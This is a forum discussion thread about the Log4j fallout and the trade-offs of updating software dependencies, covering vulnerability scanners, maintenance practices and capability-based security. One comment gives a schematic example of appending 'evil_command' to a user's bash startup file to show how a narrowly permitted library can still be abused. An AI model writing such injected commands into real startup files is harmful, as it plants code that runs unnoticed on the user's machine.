Log4j: The pain just keeps going

BrainVirus · on July 20, 2022

If you automatically update your dependencies all the time, you will constantly get new bugs, issues and sometimes even malware.

If you don't update your dependencies all the time, you will be vulnerable to old bugs and issues.

The current software engineering paradigm has no meaningful answer to this, no matter what "security experts" tell you. In a sane industry this realization would lead to a change of the paradigm, but people in our industry seem to be only doubling down.

"Use a build tool to do dependency checks!"

And then what?

"Only update libraries if they have vulnerabilities."

So, should this be a manual process where I have to dig through obscure warnings every time I build something?

"No, you can automate it!"

Congrats, you've just outsourced the decision making process about which versions of libraries to use to some 3d party. You've also made your build process reliant on yet another online service.

"But it's not a hard dependency, you can still build if the 3d party service is off."

So the exact software you compile will depend on whether or not you can connect to a 3d party service? Do you understand the actual implications of this?

Etc. People with clever advice don't seem to think it through. We're fighting fragile complexity of too many tools ducktaped together by ducktaping more tools to the whole setup. Again and again and again.

Kalium · on July 20, 2022

> The current software engineering paradigm has no meaningful answer to this, no matter what "security experts" tell you. In a sane industry this realization would lead to a change of the paradigm, but people in our industry seem to be only doubling down.

On the contrary, I believe we do. The answer is ongoing maintenance.

The basic problem is that people persist in looking at software as a fundamentally mechanistic artifact you finish and ship in a static environment. Then you move on to the next thing. This is fundamentally incorrect. Software engineering is a process that takes place in an adversarial, human-driven environment. There is fundamentally no automating this away because human decision-making work is required.

Any security expert worth their salt will tell you this. As long as you persist in trying to view software as a fixed artifact in a static environment, you will find there is no meaningful answer. Those who come to terms with the dynamic, human-driven reality will find that there's a well-understood - if inconvenient and expensive - answer.

secabeen · on July 20, 2022

So then what do you do with software that doesn't meet this standard? Software that works, that meets a need you have, but that is a fixed artifact, or at least will be in the foreseeable future. Do you refuse to use said software, and instead choose a less useful alternative that is actively developed?

SamuelAdams · on July 20, 2022

We see this all the time in healthcare. MRI imaging machine that cost 500k 20 years ago still works fine but only on Windows XP. Cost to rewrite the software for windows 10 is more than 500k so rather than paying for that instead they firewall the shit out of it so it can only talk to some printing / output device.

That’s just one example. Medical machines are expensive as hell and companies don’t want to rebuy or constantly invest in something that works and does one thing well.

bradgessler · on July 20, 2022

I was visiting my parents this summer and they have a Gameboy from 1991 with a Tetris cartridge, which was authored in 1989. They use it regularly and it still works! For over 30 years this device has played Tetris without requiring any software updates.

Kalium · on July 21, 2022

Not to split hairs, but I think what you've described is constant investment in something that works and does one thing well. The firewalls and management and maintenance are all ongoing costs to manage the risk.

Software is never just an artifact. It's a whole system, of which the source code and binaries are some components. If you do not manage those artfacts, the next best option is generally managing the environment.

krmboya · on July 21, 2022

Not familiar with such kind of software, but if it were written for, say, Linux, would it need such an expensive rewrite to work with current versions?

ithkuil · on July 21, 2022

I still run software I wrote for Linux in 1998. It runs in a LXC container with all the old libraries and it must run in an Xvnc session with a window manager of the era because there is a Qt1 widget that opens a kind of drop down menu that just doesn't work with any modern window managers.

I probably wouldn't bother to try to port it to modern versions of Qt or whatnot even if I hadn't lost the source code 15y ago.

So yes, it happens, it's possible, it sucks

pnutjam · on July 21, 2022

that gameboy cartridge isn't working on a modern system either...

efsavage · on July 20, 2022

I believe the point is that no software is a fixed artifact. Regardless of the state of its development, it's all reactive to factors outside of its control, whether that's other software, users, hardware, etc.

m_mueller · on July 20, 2022

In fact yes. I‘d choose a maintained lesser library or an in-house implementation over an unmaintained one. This is also the main benefit of python, with its huge standard lib that effectively gives some maintenance guarantees.

To give you an example: XLSX parsing. For quite a while, the most performant library ‚xlrd‘ had a big scary unmaintained notice on GitHub, yet people kept recommending and using it, often unnoticed through pandas, because they don’t read docs. I‘d refuse to touch that and instead use openpyxl, and now newer xlrd releases have even completely removed xlsx support.

Kalium · on July 20, 2022

That's a risk management problem. For how long will the world around this fixed artifact remain constant? How far away is your "foreseeable future" horizon? What happens when you're wrong? I have, in fact, chosen to use actively developed and maintained systems with fewer features than unmaintained EOL'd ones.

When you choose software to solve a problem, you're not just choosing software. You're encoding expectations around the problem, the environment, and your needs. If all three of those can be assured to never change then choosing a fixed artifact might be the way forward. Should any of those ever change, then your software will either adapt or become a less suitable solution.

How often can an organization really be that certain?

staticassertion · on July 20, 2022

That's exactly right - it's about risk. No one has "perfect" operations/ security. They have a threat model and a risk tolerance.

Veserv · on July 20, 2022

That is solved with standard engineering practices.

If you need to make guarantees about your product that are dependent on another piece of software, then you just have your vendor produce a spec and guarantee conformance to the spec, then you audit that the spec fulfills your fixed needs and audit that the implementation conforms to the spec.

Then, if you made a mistake, your liability is limited to your mistakes instead of your mistakes and the mistakes of your dependencies.

If, on the other hand, you do not get any guarantees from your dependencies, and you fail to achieve your guarantees then that is entirely on you as you are the one transforming the absence of guarantees into guarantees.

alfalfasprout · on July 20, 2022

We actually are running into this exact problem with running production ML workloads and despite anyone's claims it's not a solved problem. In fact, this log4j mess is a cake walk in comparison.

The issue: ML workloads are very sensitive to the exact version of a framework/library used and these frameworks/libraries are not stable despite what their semantic version says.

So what do you do when you have a python vulnerability? Best case, an update "just works" but in many cases you either need to retrain the model (can be extremely expensive or inconvenient), rewrite it if APIs changed, or hunt down a difference in model output if some downstream dependency broke something. Stability of software in the python world is abysmal.

xmprt · on July 20, 2022

Is this an issue of code stability or do these libraries have leaky abstractions that cause issues with models trained on previous version, because the library implementation changed and since ML has low explainability, it's hard to tell how the change impacts the model performance? eg. making a library run faster or use a slightly different parameter internally causes some floating point imprecision that cascades into wildly different results?

alfalfasprout · on July 20, 2022

Unfortunately it's all of the above. Sometimes the code isn't stable (eg; a library method changed), sometimes the behavior has changed (eg; same library method but now it has a different behavior), and sometimes it has some other unwanted effect (the computation produces a totally different result, it runs way slower, or something else).

With a service it's all much easier because you can have pretty robust integration tests and you're good to go. With an ML model it's a lot trickier because even if you have sample payloads and responses there might be other payloads you didn't think about that could cause issues. Or it might rear its ugly head when you finally retrain the model and suddenly model performance is crap.

dotnet00 · on July 20, 2022

There's also the issue that subtle bugs are a lot harder to find in ML since often the model just adapts (although potentially with worse performance). This then breaks models when the framework updates.

One recent example that comes to mind is that PyTorch now disables Ampere GPUs' TF32 units by default since there were some hard to find edge cases where the matrix multiply results were completely wrong compared to the expected result. This went mostly unnoticed except in a few cases where users were trying something a bit more sensitive to such issues.

I had a similar issue in one of my own models where there was an error in a normalization layer's implementation in Tensorflow (it was computing the average over the wrong axis iirc). It only became noticeable to me when I came back to retrain the model a few months later with an updated Tensorflow version and found that the results from training were not even comparable.

aclatuts · on July 20, 2022

I find Python is very prone to a lot of breaking changes even with minor version changes. And not just that, even minor versions have to match up specifically with another libraries minor version. It seems to be a community or ecosystem problem with Python, which is why I avoid Python as much as possible.

In every other ecosystem when minor version are updated there are very rarely issues, and there are little issues with compatibility with minor versions of libraries.

btilly · on July 20, 2022

My (somewhat dated) experience says that Ruby is all the way worse than Python on this.

In part due to a culture that encouraged monkeypatching. With the result that what behavior you get depends on who last monkeypatched it. So a dependency 3 deep that loads the module you expected to load last suddenly causes the monkeypatch you were depending on to disappear...

treeman79 · on July 20, 2022

Monkey patching was the greatest thing ever. Until the community realized how bad it was. Don’t see it much these days

skrtskrt · on July 20, 2022

eh, people love to break stuff on minor version changes of Go libraries to

wizofaus · on July 20, 2022

At least you find out at compile time...

kag0 · on July 24, 2022

is this ML workload an "I trained a model, pickled it, and now we ship that around in production" type situation?

einpoklum · on July 20, 2022

> So what do you do when you have a python vulnerability?

If you are willing to run other people's arbitrary (Python) code, then - vulnerability or no, you should consider the system running this code as compromised.

hinkley · on July 20, 2022

When I worked on a code signing app, which is arguably some of the highest stakes of almost anything I've worked on, we came around to an agreement that one ticket a month would be assigned to upgrade libraries, and we rotated that responsibility. We didn't stipulate what library, we didn't even stipulate which application in the suite (though it was assumed that you were likely to chose your primary application as the target), so long as something got upgraded.

This policy evolved, if memory serves, after a security issue was discovered with the XML library we were using. The fix was not back ported to our version, and the versions in between had multiple breaking changes, so it was a slog to fix it.

It wasn't even that we were having a production issue, because we were still in development and internal testing. Not a single 'real' signature had been generated yet. It was all test assets and test CA certs. But we had enough wisdom to put 2 and 2 together and get 4, so we tried to treat the situation as a dress rehearsal for some later bug that happened after we started playing for keeps. Almost everyone could see this was an untenable situation.

There were consequences of course, but we made a bit of lemonade in the process. Our integration tests were expanded to include a larger percentage of pinning tests for our dependencies. Given the gravity of the situation, we needed those anyway. We just now had a poster child for doing the work.

agumonkey · on July 20, 2022

> we rotated that responsibility

how did that go ? I often wanted to do it but never got to submit the idea.

hinkley · on July 20, 2022

A couple didn't get it, a few chose things we might not have picked, but that was fine because sooner or later having 'dumb' out of date dependencies adds up to real problems.

It also took some reminders from the leads to add it in instead of letting it slip, but so far it's the least broken process I've gotten to use.

SomeCallMeTim · on July 20, 2022

>"Use a build tool to do dependency checks!" > >And then what? > >"Only update libraries if they have vulnerabilities." > >So, should this be a manual process where I have to dig through obscure warnings every time I build something? > >"No, you can automate it!" > > Congrats, you've just outsourced the decision making process about which versions of libraries to use to some 3d party. You've also made your build process reliant on yet another online service.

Sorry, this is a total strawman. Automation doesn't need to be integrated with the build in such a way that it creates noise, and it doesn't mean you need to let changes be applied without human intervention.

I'm hooked up with Snyk which scans all of my dependencies and sends me a summary email if it discovers any vulnerabilities. It creates PRs that can patch dependency vulnerabilities, and I can apply them if I approve of the change. If I don't think the change is worth it or the vulnerability is relevant, I can go to the Snyk site and mark a vulnerability to be ignored, or even tell it to ignore it for a month or whatever. I'm sure Snyk isn't unique, either.

Yes, a human should be involved in decisions. No, it doesn't need to be noisy.

I'm on Node.js and working on multiple projects with crazy numbers of dependencies, and the number of "new vulnerabilities" I see is typically a few per month at most. Some months there are no new notifications at all. It simply doesn't change that quickly, and it's not constant noise unless you ignore the notifications, and that's just bad software engineering.

aahortwwy · on July 21, 2022

> If I don't think the change is worth it or the vulnerability is relevant, I can go to the Snyk site and mark a vulnerability to be ignored, or even tell it to ignore it for a month or whatever.

I am currently fighting with our security team because they refuse to allow developers to do this, and instead require my team to file tickets with their team, wait hours for that ticket to be picked up, explain why a thing is a false positive to a person who doesn't understand the codebase they're working on, and hope that person feels that the finding should be ignored.

I do not work at a large company.

This is greatly exacerbated by the fact that Snyk - like all package scanners - primarily flags false positives. When you start digging in to what it flags you'll find that a lot of the vulnerabilities aren't reasonably exploitable, or the impact is questionable, or you can't repro the issue. Those that do legitimately affect the underlying library often don't affect your usage of that library. I'd estimate our false positive rate is >90%. So when we get a finding our options are to go through that costly and disruptive process I mentioned above, or just upgrade the dependency (which carries associated risk of breaking shit in production).

These tools emphasize the quantity of findings they produce, and quietly ignore the quality. As soon as you have any divergence in motivations or incentives between the people running the scanner and the people being blocked by the scanner those low quality findings become incredibly costly.

freeqaz · on July 21, 2022

This is compliance vs security. Finding vulns checks a box for SOC2, but in reality detection is the easy part. Figuring out what to fix, based on real-world usage and risk, requires much more work and is often ignored.

I'm sorry you're on the receiving end of this problem!

Shill notice: I'm working on an Open Source tool[0] that makes this problem less horrible. My colleague wrote a post about our hypothesis[1] about how we can avoid this false positive trap.

I'd love to chat with anybody feeling this pain (even just as therapy lol).

0: https://github.com/lunasec-io/lunasec

1: https://www.lunasec.io/docs/blog/the-issue-with-vuln-scanner...

bastardoperator · on July 20, 2022

This is basically what Dependabot on GitHub does too. If it finds a vulnerability it creates a PR that you can decide to apply. It's automated to the extent that it's easy but it's not making or forcing changes on you. A human is still in control.

SomeCallMeTim · on Aug 2, 2022

True enough, though Snyk will sometimes offer a patch rather than a PR to a new version of the dependency.

The Snyk tools apply to the patch directly to (e.g.) `node_modules` after the latest code has been downloaded.

_ktx2 · on July 20, 2022

I think people's experiences will vary with tools like this due to company policy. For instance, your company allows you to make decisions about whether a vulnerability pertains to you, but many don't. I think that's how these tools become "noise", because the only option an engineer is given by leadership is to comply to the tool.

At this point, I think a lot of problems in software are actually misaligned or misincentivized policy gone awry. When you read about them on forums they look technical, but they're not.

SomeCallMeTim · on Aug 2, 2022

You can't use a technical solution to fix a management problem, no. :)

taeric · on July 20, 2022

I don't see how you have really fixed the break much. Especially if you can "push back" and say no to an update, you are just setting yourself up for when the update is even harder to accept. (That is, the further behind on an update you are, the harder to take it. Typically.)

And then there is the "I want the fix, but I don't want the added attack vector of features that comes with it."

SomeCallMeTim · on Aug 2, 2022

99% of the time it's a minor update patch that you really should just apply, or Snyk will add a patch to the build to fix the security hole directly.

Honestly it's just not worth worrying about whether a security hole is exploitable when the decision is whether to accept a minor update patch. Just accept the patch PR and move on.

The times you need to do a major update to get a patch fix it's equally important to just make that upgrade, since that means the ancient version you're using is likely out of maintenance and likely is throwing warnings that you're using a deprecated version.

Yes, it's more work to perform a major upgrade. But that doesn't mean it isn't good engineering to keep your tools up to date.

kelnos · on July 20, 2022

Sure, but you're in control, and can decide to do what's best for you and your organization. Taking on the technical debt of allowing your dependencies to get further and further behind isn't a decision I usually make, but it can be a valid one depending on the individual circumstances.

taeric · on July 20, 2022

I mean, you aren't wrong. But this is akin to saying you don't need a memory safe language, because you can decide what is best for your applications memory needs.

That is, I think the ask is more of "why haven't we come up with something that is a bit better at mitigating risks, here?"

SomeCallMeTim · on Aug 2, 2022

Software engineering is complex. Some of the challenges are simply irreducible.

I believe this is one of them.

autokad · on July 20, 2022

Lets not forget that promotions are for those who build new stuff and those who maintain old stuff don't get promoted.

To add further insult to injury, colleges send SWE/SDEs to the work force to learn to 'actually code', while companies have no time to train jr developers so they are just thrown in the fire and hope for the best.

xmprt · on July 20, 2022

At most companies I've worked for, mentoring and training junior engineers is a requirement for promotion. Also, you might not get promoted for maintenance but

1. keeping it running with a healthy userbase and demonstrating high impact does, and

2. if you know how to spin it, then maintenance work can look like "building new stuff".

kelnos · on July 20, 2022

> At most companies I've worked for, mentoring and training junior engineers is a requirement for promotion.

You've worked for some great orgs, then! My experience is mostly the opposite. One company I worked for did value mentorship, at least somewhat, and it was a factor in promotion decisions, but not mentoring others didn't really stop people from getting promoted.

Nicook · on July 20, 2022

I think this is more of a "do what I say, and not what I do" thing. Nominally most companies want you to mentor junior devs, but the worker who spends less time on that, and more time on higher visibility work gets the promotion priority.

apeace · on July 20, 2022

I have a very simple solution, in three parts:

1) We use very few dependencies. We err on the side of writing our own function, library, or UI component rather than installing a new dependency, even if a "better" open-source version might theoretically be available.

2) We use a monorepo. We have two Go backends sharing the same go.mod, and three Typescript/React frontends sharing the same package.json, all in the same repo. An upgrade for one is an upgrade for all.

3) Every first Friday, I update all dependencies to the latest version. Including major versions. Yes this is a pain sometimes (like when I realized we were on Webpack 4 and the latest was Webpack 5), but if you do it consistently, it's usually not that much trouble. 1-2 hours per month on average.

In terms of security, I think this is a good middle ground. The approach has other benefits than security, too.

Griffinsauce · on July 20, 2022

> 1) We use very few dependencies. We err on the side of writing our own function, library, or UI component rather than installing a new dependency, even if a "better" open-source version might theoretically be available.

This just means you likely have a lower quality version with the same problems but without the benefit of an ecosystem to find them.

apeace · on July 21, 2022

It doesn't mean that at all. When we need one feature we write it, rather than exposing the 1000 features of an open-source library to the internet when we only need one feature.

We won't write it ourselves if we aren't sure we can do it well, i.e. we're not going to roll our own encryption. Those are the types of dependencies we do use, and upgrade once a month like clockwork.

The point is not "don't use someone else's encryption library," the point is "don't use someone else's LeftPad() function that takes 3 lines to write". That gives us fewer dependencies, which makes it easier to upgrade all dependencies regularly, which is good for security.

pixl97 · on July 20, 2022

>We use very few dependencies.

While this may solve the "exploit from 3rd party dependencies" this says nothing about the security quality of your functions. Now instead of the vuln being found in the 3rd party package and fixed, the issue remains in your program forever, probably getting exploited by nation state level actors without your knowledge.

citrin_ru · on July 20, 2022

A benefit of writing own functions - you'll not implement something you don't need, which reduces attack surface.

pixl97 · on July 20, 2022

Until your developer decides to write their own encryption routines.

Spooky23 · on July 20, 2022

Yup, you’re outsourcing your decisions in exchange for not doing the work. You have to understand your risks and needs.

Your boring business systems that will live for 50 years need to have boring system level libraries or stuff you maintain. Your fast time to market or non-critical systems are optimized by speed and cost.

If your service depends on a bunch of downstream stuff, your processes need to support upgrade cycles. If you can’t keep up with that, you need to refactor.

_lqaf · on July 20, 2022

There is pressure in our org to find ways to have fewer dependencies.

Some of this is trivial, and a very good thing - stop using bullshit exercises in fragmentation like isEven.

Some of it is very much not, and will apply pressure to find vendors who are willing to vet their own bundles of commonly used libs.

There will be numerous second order effects of that, including the ghettoization of open source that isn't "QualStrike Approved(tm)".

rowanG077 · on July 20, 2022

System level libraries are a huge risk. It makes updating much harder leading to many developers just foregoing updates unless absolutely necessary. Libraries your software uses should be decoupled as much as possible from system level libs.

hnav · on July 20, 2022

Big-tech has solved this internally. Everything down to the linux kernel they're running in prod is versioned and has people maintaining it and interacting with upstream (if any). This is obviously a full time job for at least a person per dependency on average.

_dain_ · on July 20, 2022

>The current software engineering paradigm has no meaningful answer to this, no matter what "security experts" tell you. In a sane industry this realization would lead to a change of the paradigm, but people in our industry seem to be only doubling down.

Capability-based security is one possible answer. The Austral language is trying to make this a first-class language feature:

>The problem is that code is overwhelmingly permissionless. Or, rather: all code has uniform root permissions. The size of today’s software ecosystems has introduced a new category of security vulnerability: the supply chain attack. An attacker adds malware to an innocent library used transitively by millions. It is downloaded and run, with the user’s permissions, on the computers of hundreds of thousands of programmers, and afterwards, on application servers.

>The solution is capability-based security. Code should be permissioned. To access the console, or the filesystem, or the network, libraries should require the capability to do so. Then it is evident, from function signatures, what each library is able to do, and what level of auditing is required.

https://austral.github.io/spec/rationale-capabilities

mgsouth · on July 20, 2022

There are a few issues here...

1. Depending upon context, *any* change to state (network I/O, console I/O, file I/O, environment variables, etc.) is a security vulnerability you can drive a truck through. For example: Foo is a very-locked down package that only appends text to a file the caller owns. It's formally verified to only change the file specified, verified to only append in all possible situtations, verified to not have cross-file-system identity problems, not subject to file renaming race conditions, yada yada yada. Safe? No. "foo('evil_command' '~/.bash.rc')".

2. A useful definition of a "capability" depends upon context. A *dynamic* context. Say Foo is intended to be used for generating log files. There's no way for a third-party library to determine whether the target is actually such a thing. It requires manual tuning which fits the operational context. Perhaps the file must be named "/var/log/${x}.log". Or maybe its "${home}/local/log/${x}.log". Great. Of course, now you've got to verify the context-specific defintions. And verify the tool that does this verification. And the verify the configuration of the tool that does the verification... Safe now? No. Context is *dynamic*. "foo('var/log/evil-hack-attempts.log' '0.0.0.0/0 tried-to-crash-us')", and your other context, the automated blacklisting, locks out the Internet.

3. This gets very complex very quickly. IMHO, configuring Selinux, in a real production environment with real personell, is akin to rolling your own cryptography. Can people learn to do it? Of course. But the same argument applies to writing cryptographic functions. You. Will. Make. Huge. Mistakes.

To be clear, this does not mean that capabilities are useless. It's obviously critical that they exist. However, they ain't magic. You can't "solve security with capabilities." There is a point where throwing more of them at the problem makes things *worse*.

shikoba · on July 20, 2022

What? Are you crazy? Talking about security to developers! How dare you?

ClumsyPilot · on July 20, 2022

because our industry is obsessed with abstractions - the moto is to never fix anything, just pave over it with another abstraction.

for example we didnt fix how we build applocations and manage dependancies, we invented docker.

we didn't create a secure runtime for the cloud where applications can run, instead we virtualised whole operating systems

leeoniya · on July 20, 2022

> because our industry is obsessed with abstractions

"we do not break userland, period" -- Linus Torvalds

not breaking existing stuff is why many abstractions exist, and even why many are put in place early on, to allow for some wiggle room without having to break all the things. people tend to prefer software that continues to work, above all else.

kelnos · on July 20, 2022

I think we should acknowledge, though, that not all abstractions are created equal. Abstractions that hide implementation details and allow people to change those implementation details without creating churn and extra work for their downstream consumers are good.

Abstractions that paper over problems that you are unwilling or undisciplined enough to tackle properly are usually bad. I think the grandparent was talking about this kind.

leeoniya · on July 20, 2022

> Abstractions that paper over problems that you are unwilling or undisciplined enough to tackle properly are usually bad

some abstractions carry decades of legacy (e.g. linux file-system hierarchy), and cannot simply be replaced. things that did not connect to the non-existent internet did not have to paper over problems that simply could not exist at that time (VMs, multi-user, multi-tenant hardware). there is plenty of deep software dependencies that are no longer maintained which still rely on these abstractions and cannot be cheaply/reasonably replaced in the field. sure, we have new abstractions since then, but only new and actively maintained software can ever make use of them, and that will only end up in systems that are also actively maintained instead of simply continuing to work with exactly zero effort.

ClumsyPilot · on July 20, 2022

but then someone builds a bank on top of this abstraction, and sorts of shit hits the fan.

pixl97 · on July 20, 2022

Working in the industry I do, there are a number of banks I will never used based on the terrifying lack of quality in the software they write. The SBOM on these projects could be printed out and bound as a dictionary there are so many packages included.

leeoniya · on July 20, 2022

except, it's turtles all the way down. is POSIX not an abstraction? TCP? C/gcc/llvm? glsl?

ActorNightly · on July 20, 2022

You are correct, but its not just abstractions, its specifically abstractions on a shitty platform.

The whole log4j thing happened is because java is very poorly designed from the get go, and one of those points is the insistence of making everything an object, including data. And of course, you often need to output the string representation of data.

From a theory perspective, if you want to rely on language features like strong typing to ensure correctness, then you have to take it all the way to full provability, where you explicitly guarantee bounded input, bounded output, and any side effect (where a network call is a side effect, and if your code doesn't explicitly state that this side effect will happen, it won't run).

bick_nyers · on July 20, 2022

There is likely never going to be an approach that yields 0 vulnerabilities, so instead we should be more focused on minimizing the risk as much as possible. There is a middle ground and nuance between never update and always update, just as there is a nuance in how much and what you duck tape together.

Not sure if it's the best, but my current approach is to target major revisions/versions with ABI/API compatibility as viable candidates, and update always, but at a lagged rate, ideally allowing enough time to pass for vulnerabilities to be surfaced in those versions. Log4j is a tough case due to how far back it goes version-wise, but you simply can't win them all.

Another important way to minimize risk is to have a strong ability to provide a corrective action. If replacing the version or the entire dependency of a library you use takes a significant engineering effort, then you are arguably at a higher risk due to that than you are in your decision to never vs. always update.

AshamedCaptain · on July 20, 2022

I still think that betteer ABI/API stability & control _is_ the ideally better solution, but even if I'm a fan of plain old C / sonames dependency management, I'll readily admit that very few people actually do any type of API promises these days, much less API.

brundolf · on July 20, 2022

ABI/API stability != behavioral stability, though. I can give you a dependency with exactly the same interface, that will still break your software. It's not a solution (even if it helps with one piece of the puzzle)

The only complete solution would be static analysis (read: type systems) that can guarantee everything about some code's contract/behavior relative to the caller. Short of that, it's just going to continue being a bunch of manual half-solutions like API checks, existing type-level checks, manual changelog reading, manual upgrades, testing, etc.

feffe · on July 20, 2022

I think a mindset that could work is to accept software as done. This is hard but for foundational stuff it could work well. Only fix bugs in such software. Try to set a scope what the software should do, build it, then do maintenance on it. Supersede it entirely to add new functionality.

That's my armchair take on it.

seoaeu · on July 20, 2022

Adding features to existing software is much cheaper than writing entirely new software (not to mention the cost to switch!) At the same time, new features in low level software can unlock substantial value. Say a new API that speeds up your app by 1% or cuts down on further development time by a small fraction.

kelnos · on July 20, 2022

> Congrats, you've just outsourced the decision making process about which versions of libraries to use to some 3d party.

Aren't we already doing that, to some degree, by watching for notifications of vulnerabilities, and then manually patching or updating? Sure, with this method, we have the ability to decide to ignore a vulnerability, but I'd guess most people aren't great at assessing risk (and may not fully understand the severity of a vuln, or if their use of the software makes them exploitable), and should probably just update whenever a fix for a vulnerability comes out. So you might as well automate this.

> So the exact software you compile will depend on whether or not you can connect to a 3d party service?

Anyone who builds against public package registries (Maven Central, npm, pypi, crates.io, etc.) already has this problem. Some people will go to the effort of putting their own proxy cache in front of these registries to insulate themselves from downtime, and I expect these sorts of people would do the same for a 3rd-party vulnerability updater service.

Regardless, I wouldn't expect this to be a "pull" model, wherein you wait until the next time you'd build before getting security updates. More likely you would get a notification or even an automatically generated pull request (like GitHub's dependabot does) when a security update is available. Then it's up to you whether you want something else to automatically apply those updates, or you can review them yourself and apply manually.

I think you're just making a mountain out of a molehill. There are several existing options to automate or partially automate this, depending on your trust of the relevant third party. And you can still do it manually, if you so desire.

voxl · on July 20, 2022

And what would you have anyone do?

You could formally spec software and implement it, congrats you're now 1000x slower to market and any change you want to make is another 1000x investment to spec out and prove.

And let's not even mention the ridiculous idea that open source developers be expected to do this. Moreover, this doesn't even handle hardware problems!

Okay, but we could just build all the software internally, reinvent all the wheels. But how is this any better? Now you have even less manpower to fix bugs and you're probably 100x slower to market because you're building all these half baked, bug ridden libraries.

If anything, the best idea is formally verified sandboxing, so that you have strong assurances about certain apps not doing bad stuff, but this doesn't solve all problems either.

It's an unsolvable problem in general, which is why no one has solved it.

pclmulqdq · on July 20, 2022

It takes a lot longer to build houses that are up to building codes, and bridges that have 10x safety factors rather than 2x. There's a reason we have building codes and large safety factors. Software engineers are discovering this today.

fisf · on July 20, 2022

Software engineers are mostly aware of this. There is just little market demand for this level of robustness.

TheCapn · on July 20, 2022

Engineering Code of Ethics dictate that safety of public and environment is paramount. I know that's true for my P.Eng governing body; it is written into our bylaws. I'm sure its the same for most others as well.

I think until Software Engineering catches up in this regard with traditional Engineering disciplines we'll continue to see issues arise from the software realm. As much as the self-titled "Engineers" proclaim it, there's more to engineering than design and production.

kelnos · on July 20, 2022

I've always been uncomfortable calling myself a "software engineer" for this reason, and usually refer to myself as a "software developer". Most of the job listings I see at various companies use "engineer" though, and so my official title ends up being "engineer", so that's what I end up putting on my resume. (Though I guess I don't really need to do that; I could put whatever I want.)

TheCapn · on July 22, 2022

I am a Software Engineer. I'm licensed by our provincial body and have my P.Eng. and yeah, I still agree with you.

I've been asked why I got my P.Eng as it does nothing for me career wise, but I always have the hope that we move towards a profession that does utilize engineers with proper accreditation and responsibilities where appropriate. I work in Industrial Controls and what my job has me doing does have safety concerns. We fired a student at one point working for us because his attitude towards the work was lackluster and lazy. I see it often enough in programs I'm asked to pick up and fix too.

If Software Engineering wants respect, the profession needs to accept that we're going to piss off a lot of Developers & Architects using the title incorrectly. We still need to develop the proper rigor to take Engineering as a discipline seriously, but we also don't need to apply "Engineers" to every job.

ruined · on July 20, 2022

there was no market demand for building codes, either. that's why they're laws

ClumsyPilot · on July 20, 2022

bbut but mah free market gave us fire escapes attached to every building in new york, and they were made of wood!

twunde · on July 20, 2022

I know you're being sarcastic, but this reminded me of Tanya Reilly's _great_ talk "The history of fire escapes: How to fail". There's a recording up at https://www.infoq.com/presentations/history-fire-escapes-res...

sebzim4500 · on July 20, 2022

Countries that pass laws making it 10x more difficult to develop software will not survive the next few decades.

uticus · on July 20, 2022

> We're fighting fragile complexity of too many tools ducktaped together by ducktaping more tools to the whole setup. Again and again and again.

You’ve brought up three relevant points: 1. The tools are software, which strength and weakness is being easy to change. 2. The tools rely on abstraction, which strength and weakness is summarizing/hiding complexity. 3. Communication between publishers/consumers of these tools is hard.

Armchair-coaching I now come up with at least three solutions: 1. Re the weakness of #3: ensure when an issue is found at one layer, communication happens to maintainers of all other layers up and down. 2. Re the weakness of #2: collapse the layers – analyze dependencies and don’t go past more than x number of abstractions. 3. Re the weakness of #1: don’t use software.

citrin_ru · on July 20, 2022

There is no free lunch - each line of code is a liability even if it comes form a dependency. You wrote a few lines of code which depends on 100k LoC library and now you are exposed to bugs and vulnerabilities which may exists in these 100k LoC, not only in your few lines.

If you using a library you have to spend time on keeping it up to date (which includes testing and fixing whatever when wrong during an update).

agumonkey · on July 20, 2022

And there's the tangling of dependencies. One fix in one lib may cause a bug in another that isn't maintained.

paulmd · on July 20, 2022

Or you can end up with conflicting versions of transitive dependencies.

Or even worse you may have a legacy "fat jar" that you can't even manage the transitive dependencies on - they're compiled in, and that's that. Something else has a version conflict? Tough shit, one or the other is going to break, and depending on how bad your build is, you may not even get an explicit choice, it may be thrust upon you by the classloader.

Sometimes you can mitigate it somewhat by encapsulating them in their own service and just firewalling the hell out of it, and modules should help the dependency conflicts somewhat, but the problem is these are basically "UXO in the backyard garden", they are a passive business risk and sooner or later you may get lucky and they go boom even though you did nothing wrong.

Despite your best intentions, sometimes you gotta update dependencies, and if you allow it to fester, then you risk that the time you have to solve the problem is during an urgent security crisis. Generally it is better to update them on your own timetable than to have it forced upon you like that. And the problems and limitations and workarounds only become worse and worse over time if you choose to actively ignore it.

agumonkey · on July 20, 2022

it's an interesting issue technically.. if only we didn't have to suffer its reality :)

staticassertion · on July 20, 2022

Just patch on a cadence and assume you've got some vulnerabilities lying around. When there's something serious like log4j, pull the lever to update asap. I think you're overcomplicating this.

It'd be cool if devs didn't suck ass at writing code but that's the world we live in.

AndyMcConachie · on July 20, 2022

The ease with which software remains mutable after deployment is both a blessing and a curse. This is particular and intrinsic to software and other digital artifacts. Things based in matter do not benefit from this blessing or suffer from this curse.

PKop · on July 20, 2022

"If you automatically update your dependencies all the time, you will constantly get new bugs, issues and sometimes even malware.

If you don't update your dependencies all the time, you will be vulnerable to old bugs and issues."

>has no meaningful answer to this...a sane industry this realization would lead to a change of the paradigm

This sounds like gene mutation and evolutionary selection pressure. It's sort of a fundamental aspect of the universe no? There may not really be a meaningful "answer" to this in principle just various half-measures to muddle along and adapt to this reality, survival of the fittest in a sense.

ziddoap · on July 20, 2022

>no matter what "security experts" tell you

Why the scare quotes?

>In a sane industry this realization would lead to a change of the paradigm, but people in our industry seem to be only doubling down.

Maybe because half the time people with extensive training/experience in security start to even say something they are completely disregarded (like here), or are hamstrung by budget because security is viewed as a garbage disposal that profits get shoveled into, or because they are hamstrung by pushback over every little change because people seem to think the main goal of someone doing security is pissing off users.

Genbox · on July 20, 2022

I was wondering when it would become the norm to call it "ducktape". It has been 3 hours and nobody has corrected it. Last week I found a 3-pack of "ducktape" in the builders market.

I'm not making fun of you or trying to be funny - it is simply an observation that I find interesting.

_ofdw · on July 20, 2022

Where I live there's a brand of duct tape called Duck Tape. It's terrible compared to the 3M brand tape, but it's cheap so it's popular.

Also nobody that knows what they're doing uses "duct tape" on ducts, so the name is pretty meaningless.

shepherdjerred · on July 20, 2022

> So the exact software you compile will depend on whether or not you can connect to a 3d party service? Do you understand the actual implications of this?

This is already true with the vast majority of software using any an online software repository, e.g. Go, NodeJS, Java, Rust, etc.

laughingbovine · on July 20, 2022

Yeah but you can cache the packages or store them in some fashion. I've seen JAR files in git repos far too many times...

With security, you need some online service so you can find the new CVEs every day.

kelnos · on July 20, 2022

> With security, you need some online service so you can find the new CVEs every day.

